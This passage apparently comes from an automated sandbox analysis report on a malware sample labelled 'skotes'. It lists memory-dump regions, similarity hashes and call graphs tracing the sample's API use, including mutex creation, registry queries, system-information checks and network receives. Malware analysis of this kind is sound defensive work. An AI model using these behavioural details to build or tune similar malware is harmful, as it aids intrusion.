                                                                                                                                                                                                        • Associated: 00000003.00000002.268899158645.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899205310.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899242154.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899281797.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899324488.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899367116.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899409985.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899456104.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899506082.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899558796.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899604806.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899647227.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899692997.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899733316.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899733316.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899873452.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899915305.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899955435.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900002889.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900050472.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900094567.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900135220.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900186248.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900228243.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_9c0000_skotes.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                        • Opcode ID: 3434714a6c6360ccb7d3adb1a6475e25c9f5e3e9a80f64fee46d6ec7287b0cc2
                                                                                                                                                                                                        • Instruction ID: 371e6f7cbda5a2cd6f6ab921b854f8d24874ac682be8dde62c166e71ea443134
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3434714a6c6360ccb7d3adb1a6475e25c9f5e3e9a80f64fee46d6ec7287b0cc2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4D216A32B412099BEB18DB68DC99F6DBB65EBD5314F20421DE404973D4C7399A808753

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 351 9fd82f-9fd83a 352 9fd83c-9fd846 351->352 353 9fd848-9fd84e 351->353 352->353 354 9fd87c-9fd887 call 9f75f6 352->354 355 9fd867-9fd878 RtlAllocateHeap 353->355 356 9fd850-9fd851 353->356 360 9fd889-9fd88b 354->360 357 9fd87a 355->357 358 9fd853-9fd85a call 9f9dc0 355->358 356->355 357->360 358->354 364 9fd85c-9fd865 call 9f8e36 358->364 364->354 364->355
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,009FA813,00000001,00000364,00000006,000000FF,?,009FEE3F,?,00000004,00000000,?,?), ref: 009FD870
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.268897285467.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897231334.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897285467.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897469676.0000000000A29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897531196.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897605032.0000000000A37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268897963140.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898007853.0000000000B98000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898064981.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898115829.0000000000BB1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898160888.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898160888.0000000000BBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898257929.0000000000BBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898307061.0000000000BC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898351313.0000000000BC2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898396305.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898441590.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898485575.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898530916.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898572212.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898614687.0000000000BCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898658203.0000000000BD4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898713220.0000000000BE9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898762071.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898796658.0000000000BEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898834319.0000000000BED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898872512.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898911110.0000000000BF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268898958632.0000000000BF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899004161.0000000000BFD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899049281.0000000000BFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899095311.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899158645.0000000000C18000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899205310.0000000000C1C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899242154.0000000000C26000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899281797.0000000000C29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899324488.0000000000C2A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899367116.0000000000C30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899409985.0000000000C31000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899456104.0000000000C33000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899506082.0000000000C48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899558796.0000000000C49000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899604806.0000000000C4B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899647227.0000000000C51000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899692997.0000000000C5B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899733316.0000000000C5C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899733316.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899873452.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899915305.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268899955435.0000000000CC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900002889.0000000000CC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900050472.0000000000CC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900094567.0000000000CCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900135220.0000000000CCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900186248.0000000000CDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.268900228243.0000000000CDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_9c0000_skotes.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                        • Opcode ID: 339d6105037baaff6bdf2ab04d99938f0e32a40205a58c8fd8112a6a43144ee4
                                                                                                                                                                                                        • Instruction ID: c34f753a44a947cce649f2f8e1c07e22d7f972e6d0ff583a6f6c260e403e17db
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 339d6105037baaff6bdf2ab04d99938f0e32a40205a58c8fd8112a6a43144ee4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6EF0823264722DA6EB21BA76DC01B7B7B5F9F817F0B298521FF14A7191DA20DC0187E1

                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                        Execution Coverage:2.9%
                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                        Total number of Nodes:745
                                                                                                                                                                                                        Total number of Limit Nodes:11
                                                                                                                                                                                                        execution_graph 12482 b3c4e 12483 b3c58 12482->12483 12484 b3c65 12483->12484 12490 b23d0 12483->12490 12486 b3c8f 12484->12486 12487 b37d0 4 API calls 12484->12487 12488 b37d0 4 API calls 12486->12488 12487->12486 12489 b3c9b 12488->12489 12491 b23e4 12490->12491 12494 cb45d 12491->12494 12502 e3a1a 12494->12502 12496 b23ea 12496->12484 12497 cb4d5 12509 cb0dd 12497->12509 12498 cb4c8 12505 cae86 12498->12505 12513 e4e59 12502->12513 12504 cb485 12504->12496 12504->12497 12504->12498 12506 caecf 12505->12506 12508 caee2 12506->12508 12519 cb2cf 12506->12519 12508->12496 12510 cb108 12509->12510 12512 cb111 12509->12512 12511 cb2cf 5 API calls 12510->12511 12511->12512 12512->12496 12514 e4e5e 12513->12514 12514->12504 12515 ed4f4 4 API calls 12514->12515 12518 e8abf 12514->12518 12515->12518 12516 e651d 3 API calls 12517 e8af2 12516->12517 12518->12516 12520 cbe0f InitOnceExecuteOnce 12519->12520 12521 cb311 12520->12521 12522 cb318 12521->12522 12530 e6beb 12521->12530 12522->12508 12524 cb34e 12525 cbe0f InitOnceExecuteOnce 12524->12525 12526 cb391 12525->12526 12527 cb398 12526->12527 12528 e6beb 4 API calls 12526->12528 12527->12508 12529 cb3ce 12528->12529 12529->12508 12531 e6bf7 12530->12531 12532 ea531 4 API calls 12531->12532 12536 e6bfc 12532->12536 12533 e8aaf 4 API calls 12534 e6c26 12533->12534 12535 e6c35 12534->12535 12537 e68bd 4 API calls 12534->12537 12535->12524 12536->12533 12538 e6c5d 12537->12538 12538->12524 12712 b9a0c 12713 b9a1a 12712->12713 12717 b9a2e 12712->12717 12714 ba847 12713->12714 12713->12717 12715 ba883 Sleep CreateMutexA 12714->12715 12716 ba8be 12715->12716 12718 b5b20 2 API calls 12717->12718 12719 b9aac 12718->12719 12720 b8a60 2 API calls 12719->12720 12721 b9abd 12720->12721 12722 b5b20 2 API calls 12721->12722 12723 b9be1 12722->12723 12724 b8a60 2 API calls 12723->12724 12725 b9bf2 12724->12725 12577 b2080 12578 cc5bb 2 API calls 12577->12578 12579 b208c 12578->12579 12692 b2dc0 12693 b2de8 12692->12693 12694 cc5bb 2 API calls 12693->12694 12695 b2df3 12694->12695 13026 b7780 13027 b77c1 13026->13027 13028 b5b20 2 API calls 13027->13028 13030 b7853 13027->13030 13028->13030 13029 b5b20 2 API calls 13032 b79b3 13029->13032 13030->13029 13031 b7923 13030->13031 13033 b5b20 2 API calls 13032->13033 13034 b79e5 13033->13034 13035 b5b20 2 API calls 13034->13035 13040 b7a75 13034->13040 13036 b7b4d 13035->13036 13037 b5b20 2 API calls 13036->13037 13038 b7b70 13037->13038 13039 b5b20 2 API calls 13038->13039 13039->13040 12383 b3c07 12384 b3c11 12383->12384 12387 b3c1f 12384->12387 12390 b3290 12384->12390 12385 b3c28 12387->12385 12409 b37d0 12387->12409 12413 cc5dc 12390->12413 12392 b332b 12419 cc19a 12392->12419 12395 b32fc 12396 cc19a 5 API calls 12395->12396 12399 b3310 12395->12399 12397 b3337 12396->12397 12400 cc5dc GetSystemTimePreciseAsFileTime 12397->12400 12398 b32d4 12398->12392 12398->12395 12416 cbc7c 12398->12416 12399->12387 12401 b336f 12400->12401 12402 cc19a 5 API calls 12401->12402 12403 b3376 12401->12403 12402->12403 12404 cc19a 5 API calls 12403->12404 12405 b3397 12403->12405 12404->12405 12406 cc19a 5 API calls 12405->12406 12407 b33ab 12405->12407 12408 b33ce 12406->12408 12407->12387 12408->12387 12410 b37dc 12409->12410 12470 b2400 12410->12470 12423 cc382 12413->12423 12415 cc5e9 12415->12398 12440 cbaa2 12416->12440 12418 cbc8c 12418->12398 12420 cc1c2 12419->12420 12421 cc1a4 12419->12421 12420->12420 12421->12420 12446 cc1c7 12421->12446 12424 cc3d8 12423->12424 12426 cc3aa 12423->12426 12424->12426 12429 cce9b 12424->12429 12426->12415 12427 cc42d 12427->12426 12428 cce9b GetSystemTimePreciseAsFileTime 12427->12428 12428->12427 12430 cceb7 12429->12430 12431 cceaa 12429->12431 12430->12427 12431->12430 12433 cce74 12431->12433 12436 ccb1a 12433->12436 12437 ccb2b GetSystemTimePreciseAsFileTime 12436->12437 12438 ccb37 12436->12438 12437->12438 12438->12430 12441 cbacc 12440->12441 12442 cce9b GetSystemTimePreciseAsFileTime 12441->12442 12443 cbad4 12441->12443 12444 cbaff 12442->12444 12443->12418 12444->12443 12445 cce9b GetSystemTimePreciseAsFileTime 12444->12445 12445->12443 12449 b2aa0 12446->12449 12448 cc1de 12460 cbe0f 12449->12460 12451 b2abf 12451->12448 12452 b2ab4 12452->12451 12453 ea531 4 API calls 12452->12453 12454 e6bfc 12453->12454 12455 e8aaf 4 API calls 12454->12455 12456 e6c26 12455->12456 12458 e6c35 12456->12458 12463 e68bd 12456->12463 12458->12448 12459 e6c5d 12459->12448 12466 ccb61 12460->12466 12464 e683a 4 API calls 12463->12464 12465 e68cf 12464->12465 12465->12459 12467 ccb6f InitOnceExecuteOnce 12466->12467 12469 cbe22 12466->12469 12467->12469 12469->12452 12473 cb506 12470->12473 12472 b2432 12474 cb521 12473->12474 12475 e8aaf 4 API calls 12474->12475 12477 cb588 12474->12477 12476 cb5cf 12475->12476 12477->12472 12908 c8700 12909 c875a 12908->12909 12915 c9ae0 12909->12915 12913 c8809 12914 c879c 12928 c9e20 12915->12928 12917 c9b15 12932 b2ca0 12917->12932 12919 c9b46 12941 c9ea0 12919->12941 12921 c8784 12921->12914 12922 b43b0 12921->12922 12923 cbe0f InitOnceExecuteOnce 12922->12923 12924 b43ca 12923->12924 12925 b43d1 12924->12925 12926 e6beb 4 API calls 12924->12926 12925->12913 12927 b43e4 12926->12927 12929 c9e3c 12928->12929 12930 cc5bb 2 API calls 12929->12930 12931 c9e47 12930->12931 12931->12917 12933 b2cdd 12932->12933 12934 cbe0f InitOnceExecuteOnce 12933->12934 12935 b2d06 12934->12935 12936 b2d11 12935->12936 12937 b2d48 12935->12937 12946 cbe27 12935->12946 12936->12919 12939 b2400 4 API calls 12937->12939 12940 b2d5b 12939->12940 12940->12919 12943 c9f1f 12941->12943 12945 c9f88 12943->12945 12959 ca140 12943->12959 12944 c9f6b 12944->12921 12947 cbe33 12946->12947 12948 cbe9a 12947->12948 12949 cbea3 12947->12949 12953 cbdaf 12948->12953 12951 b2aa0 5 API calls 12949->12951 12952 cbe9f 12951->12952 12952->12937 12954 ccb61 InitOnceExecuteOnce 12953->12954 12956 cbdc7 12954->12956 12955 cbdce 12955->12952 12956->12955 12957 e6beb 4 API calls 12956->12957 12958 cbdd7 12957->12958 12958->12952 12960 ca1c0 12959->12960 12966 c7040 12960->12966 12962 ca1fc 12963 ca3ee 12962->12963 12964 b3ea0 3 API calls 12962->12964 12963->12944 12965 ca3d6 12964->12965 12965->12944 12967 c7081 12966->12967 12974 b3930 12967->12974 12969 c72b6 12969->12962 12970 c711d 12970->12969 12971 cc5bb 2 API calls 12970->12971 12972 c7271 12971->12972 12979 b2e80 12972->12979 12975 cc5bb 2 API calls 12974->12975 12976 b3967 12975->12976 12977 cc5bb 2 API calls 12976->12977 12978 b39a6 12977->12978 12978->12970 12980 b2ec6 12979->12980 12988 b2f2f 12979->12988 12981 cc5dc GetSystemTimePreciseAsFileTime 12980->12981 12982 b2ed2 12981->12982 12984 b2fde 12982->12984 12987 b2edd 12982->12987 12983 b2faf 12983->12969 12985 cc19a 5 API calls 12984->12985 12986 b2fe4 12985->12986 12989 cc19a 5 API calls 12986->12989 12987->12986 12987->12988 12988->12983 12991 cc5dc GetSystemTimePreciseAsFileTime 12988->12991 12990 b2f79 12989->12990 12992 cc19a 5 API calls 12990->12992 12993 b2f80 12990->12993 12991->12990 12992->12993 12994 cc19a 5 API calls 12993->12994 12995 b2f98 12993->12995 12994->12995 12995->12983 12996 cc19a 5 API calls 12995->12996 12997 b2ffc 12996->12997 12998 cc5dc GetSystemTimePreciseAsFileTime 12997->12998 13008 b3040 12998->13008 12999 b3185 13000 cc19a 5 API calls 12999->13000 13001 b318b 13000->13001 13002 cc19a 5 API calls 13001->13002 13003 b3191 13002->13003 13004 cc19a 5 API calls 13003->13004 13010 b3153 13004->13010 13005 b3167 13005->12969 13006 cc19a 5 API calls 13007 b319d 13006->13007 13008->12999 13008->13001 13008->13005 13009 cc5dc GetSystemTimePreciseAsFileTime 13008->13009 13011 b311f 13009->13011 13010->13005 13010->13006 13011->12999 13011->13003 13011->13010 13012 cbc7c GetSystemTimePreciseAsFileTime 13011->13012 13012->13011 12305 ba786 12306 ba7a0 12305->12306 12307 ba7c2 12305->12307 12306->12307 12309 ba87e 12306->12309 12320 ba7d0 12307->12320 12321 b7d00 12307->12321 12311 ba883 Sleep CreateMutexA 12309->12311 12310 ba7de 12312 b7d00 7 API calls 12310->12312 12310->12320 12313 ba8be 12311->12313 12314 ba7e8 12312->12314 12315 b7d00 7 API calls 12314->12315 12314->12320 12316 ba7f2 12315->12316 12317 b7d00 7 API calls 12316->12317 12316->12320 12318 ba7fc 12317->12318 12319 b7d00 7 API calls 12318->12319 12318->12320 12319->12320 12322 b7d66 12321->12322 12353 b7eb8 12322->12353 12354 b5b20 12322->12354 12324 b7da2 12325 b5b20 2 API calls 12324->12325 12327 b7dcf 12325->12327 12326 b7ea3 GetNativeSystemInfo 12328 b7ea7 12326->12328 12327->12326 12327->12328 12327->12353 12329 b7fe9 12328->12329 12330 b7f0f 12328->12330 12328->12353 12331 b5b20 2 API calls 12329->12331 12332 b5b20 2 API calls 12330->12332 12333 b801c 12331->12333 12334 b7f37 12332->12334 12336 b5b20 2 API calls 12333->12336 12335 b5b20 2 API calls 12334->12335 12337 b7f56 12335->12337 12338 b803b 12336->12338 12360 e8a81 12337->12360 12340 b5b20 2 API calls 12338->12340 12341 b8073 12340->12341 12342 b5b20 2 API calls 12341->12342 12343 b80c4 12342->12343 12344 b5b20 2 API calls 12343->12344 12345 b80e3 12344->12345 12346 b5b20 2 API calls 12345->12346 12347 b811b 12346->12347 12348 b5b20 2 API calls 12347->12348 12349 b816c 12348->12349 12350 b5b20 2 API calls 12349->12350 12351 b818b 12350->12351 12352 b5b20 2 API calls 12351->12352 12352->12353 12353->12310 12356 b5b64 12354->12356 12355 b5c27 12355->12324 12356->12355 12357 b5cb7 RegOpenKeyExA 12356->12357 12358 b5d10 RegCloseKey 12357->12358 12359 b5d36 12358->12359 12359->12324 12363 e86d7 12360->12363 12362 e8a9f 12362->12353 12364 e86e9 12363->12364 12365 e683a 4 API calls 12364->12365 12366 e86fe 12364->12366 12368 e872e 12365->12368 12366->12362 12368->12366 12369 e8925 12368->12369 12370 e8962 12369->12370 12372 e8932 12369->12372 12371 ed2e9 4 API calls 12370->12371 12373 e8941 12371->12373 12372->12373 12375 ed30d 12372->12375 12373->12368 12376 e683a 4 API calls 12375->12376 12377 ed32a 12376->12377 12379 ed33a 12377->12379 12380 ef07f 12377->12380 12379->12373 12381 e683a 4 API calls 12380->12381 12382 ef09f 12381->12382 12382->12379 12539 cd041 12540 cd052 12539->12540 12541 cd05a 12540->12541 12543 cd0c9 12540->12543 12544 cd0d7 SleepConditionVariableCS 12543->12544 12546 cd0f0 12543->12546 12544->12546 12546->12540 12640 b211a 12643 cc62c 12640->12643 12642 b2124 12645 cc63c 12643->12645 12646 cc654 12643->12646 12645->12646 12647 cceee 12645->12647 12646->12642 12648 ccc05 InitializeCriticalSectionEx 12647->12648 12649 ccf00 12648->12649 12649->12645 13018 b3f5f 13019 b3f6d 13018->13019 13021 b3f76 13018->13021 13020 b23d0 5 API calls 13019->13020 13020->13021 12147 e6559 12150 e63f7 12147->12150 12151 e6405 12150->12151 12152 e6450 12151->12152 12155 e645b 12151->12155 12154 e645a 12161 ea1c2 GetPEB 12155->12161 12157 e6465 12158 e646a GetPEB 12157->12158 12159 e647a 12157->12159 12158->12159 12160 e6492 ExitProcess 12159->12160 12162 ea1dc 12161->12162 12162->12157 12167 bb0d0 12168 bb122 12167->12168 12169 bb2dd CoInitialize 12168->12169 12170 bb32a 12169->12170 12733 bae50 12734 bae93 12733->12734 12745 e6590 12734->12745 12739 e656f 4 API calls 12740 baeb0 12739->12740 12741 e656f 4 API calls 12740->12741 12742 baec8 12741->12742 12751 b5500 12742->12751 12744 baf7e 12746 ea531 4 API calls 12745->12746 12747 bae99 12746->12747 12748 e656f 12747->12748 12749 ea531 4 API calls 12748->12749 12750 baea1 12749->12750 12750->12739 12752 b5520 12751->12752 12754 b5620 12752->12754 12755 b2280 12752->12755 12754->12744 12758 b2240 12755->12758 12759 b2256 12758->12759 12762 e8667 12759->12762 12765 e7456 12762->12765 12764 b2264 12764->12752 12766 e7496 12765->12766 12770 e747e 12765->12770 12767 e683a 4 API calls 12766->12767 12766->12770 12768 e74ae 12767->12768 12771 e7a11 12768->12771 12770->12764 12773 e7a22 12771->12773 12772 e7a31 12772->12770 12773->12772 12778 e7fb5 12773->12778 12783 e7c0f 12773->12783 12788 e7c35 12773->12788 12798 e7d83 12773->12798 12779 e7fbe 12778->12779 12780 e7fc5 12778->12780 12807 e799d 12779->12807 12780->12773 12782 e7fc4 12782->12773 12784 e7c1f 12783->12784 12785 e7c18 12783->12785 12784->12773 12786 e799d 4 API calls 12785->12786 12787 e7c1e 12786->12787 12787->12773 12789 e7c56 12788->12789 12792 e7c3c 12788->12792 12789->12773 12790 e7db6 12795 e7dc4 12790->12795 12797 e7dd8 12790->12797 12815 e808e 12790->12815 12791 e7def 12791->12797 12811 e81dd 12791->12811 12792->12789 12792->12790 12792->12791 12792->12795 12795->12797 12819 e8537 12795->12819 12797->12773 12799 e7db6 12798->12799 12802 e7d9c 12798->12802 12801 e7dd8 12799->12801 12803 e808e 4 API calls 12799->12803 12805 e7dc4 12799->12805 12800 e7def 12800->12801 12804 e81dd 4 API calls 12800->12804 12801->12773 12802->12799 12802->12800 12802->12805 12803->12805 12804->12805 12805->12801 12806 e8537 4 API calls 12805->12806 12806->12801 12808 e79af 12807->12808 12809 e8979 4 API calls 12808->12809 12810 e79d2 12809->12810 12810->12782 12812 e81f8 12811->12812 12813 e822a 12812->12813 12823 ec65f 12812->12823 12813->12795 12816 e80a7 12815->12816 12830 ed199 12816->12830 12818 e815a 12818->12795 12818->12818 12820 e85aa 12819->12820 12822 e8554 12819->12822 12820->12797 12821 ec65f 4 API calls 12821->12822 12822->12820 12822->12821 12826 ec504 12823->12826 12825 ec677 12825->12813 12827 ec514 12826->12827 12828 e683a GetPEB ExitProcess GetPEB RtlAllocateHeap 12827->12828 12829 ec519 12827->12829 12828->12829 12829->12825 12831 ed1a9 12830->12831 12834 ed1bf 12830->12834 12831->12818 12832 ed256 12836 ed27f 12832->12836 12837 ed2b5 12832->12837 12833 ed25b 12843 ec9b0 12833->12843 12834->12831 12834->12832 12834->12833 12839 ed29d 12836->12839 12840 ed284 12836->12840 12860 eccc9 12837->12860 12856 eceb3 12839->12856 12849 ed00f 12840->12849 12844 ec9c2 12843->12844 12845 e683a GetPEB ExitProcess GetPEB RtlAllocateHeap 12844->12845 12846 ec9d6 12845->12846 12847 eccc9 GetPEB ExitProcess GetPEB RtlAllocateHeap 12846->12847 12848 ec9de 12846->12848 12847->12848 12848->12831 12852 ed03d 12849->12852 12850 ed076 12850->12831 12851 ed0af 12853 ecd6b GetPEB ExitProcess GetPEB RtlAllocateHeap 12851->12853 12852->12850 12852->12851 12854 ed088 12852->12854 12853->12850 12855 ecf3e GetPEB ExitProcess GetPEB RtlAllocateHeap 12854->12855 12855->12850 12857 ecee0 12856->12857 12858 ecf1f 12857->12858 12859 ecf3e GetPEB ExitProcess GetPEB RtlAllocateHeap 12857->12859 12858->12831 12859->12858 12861 ecce1 12860->12861 12862 ecd46 12861->12862 12863 ecd6b GetPEB ExitProcess GetPEB RtlAllocateHeap 12861->12863 12862->12831 12863->12862 12893 b2ad0 12894 b2ada 12893->12894 12895 b2adc 12893->12895 12896 cc19a 5 API calls 12895->12896 12897 b2ae2 12896->12897 13022 b2b50 13023 b2b8e 13022->13023 13024 cb72b TpReleaseWork 13023->13024 13025 b2b9b 13024->13025 13059 bdfd0 recv 13060 be032 recv 13059->13060 13061 be067 recv 13060->13061 13063 be0a1 13061->13063 13062 be1c3 